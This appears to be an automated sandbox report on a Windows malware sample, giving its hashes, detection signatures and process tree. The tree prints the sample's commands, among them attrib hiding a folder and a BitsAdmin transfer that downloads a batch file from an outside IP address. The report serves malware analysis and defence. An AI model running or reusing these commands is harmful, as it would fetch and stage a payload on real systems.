Analysis

  • max time kernel
    125s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2024 02:12

General

  • Target

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe

  • Size

    126KB

  • MD5

    b2dc0f8a36a7e450b11149a8e15ca964

  • SHA1

    27fd3d24a969b5b0528b69f1cbd8b293e74a6809

  • SHA256

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15

  • SHA512

    135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933

  • SSDEEP

    1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 54 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
    "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2132
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4020
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2596
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /crEaTe pls
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:4988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1756
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1812
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:420
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /ResUme pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4456
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3996
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2912
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /CompLete pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2956
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2640
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4332
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:3596
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8
    1⤵
      PID:4580

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat

      Filesize

      2KB

      MD5

      d813dcd73594622bd3f1deefd3661175

      SHA1

      5fe85bc7dde7c19f166452641d889ff48f70022d

      SHA256

      3d73776fc4c2cd443e448831a16646c779a9f24f2b1c299d9eb41e2f928f445b

      SHA512

      347bef14d9e32f00265c72ef10b8da733a2486ac8567198123f40dbcd953cb1dd6dc171bbea2c3aae270c8eafe112ec9913186f23cb91ef29c74f37d7946aa80